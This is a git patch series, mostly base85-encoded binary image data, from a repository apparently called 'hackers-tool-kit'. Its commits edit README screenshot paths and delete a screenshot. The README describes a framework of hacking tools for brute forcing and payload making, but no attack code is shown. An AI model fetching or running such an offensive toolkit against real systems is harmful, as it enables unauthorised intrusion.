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 G|M5Q#Xe46* literal 0 HcmV?d00001 From 1b92271a8a796af0813c4f494ad1fd9315e9f9b0 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:32:52 +0100 Subject: [PATCH 009/214] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 2472207..f3ea38a 100644 --- a/README.md +++ b/README.md @@ -3,11 +3,11 @@ Its a framework filled with alot of options and hacking tools you use directly i from brute forcing to payload making im still adding more stuff to see updates check on my instagram @unkn0wn_bali -![](screenshot.png) +![](tools/sc reenshot.png) -![](sc reenshot2.png) +![](tools/sc reenshot2.png) -![](s creenshot3.png) +![](tools/s creenshot3.png) # install * `git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` From 54d6a1bd3386faa9cf0bdf835b2b89490391f4b9 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Fri, 15 Feb 2019 10:33:05 +0100 Subject: [PATCH 010/214] Delete screenshot.png --- screenshot.png | Bin 44166 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 screenshot.png diff --git a/screenshot.png b/screenshot.png deleted file mode 100644 index 7b3ab7112fc5ebdf07d127fc09763422ae494fa2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 44166 zcmagG2RxST8$SNDOJyq!BPyaYN+BV#(y$(@>?Etm-Wsx!meH^YkCn1QD5O+GMwuad 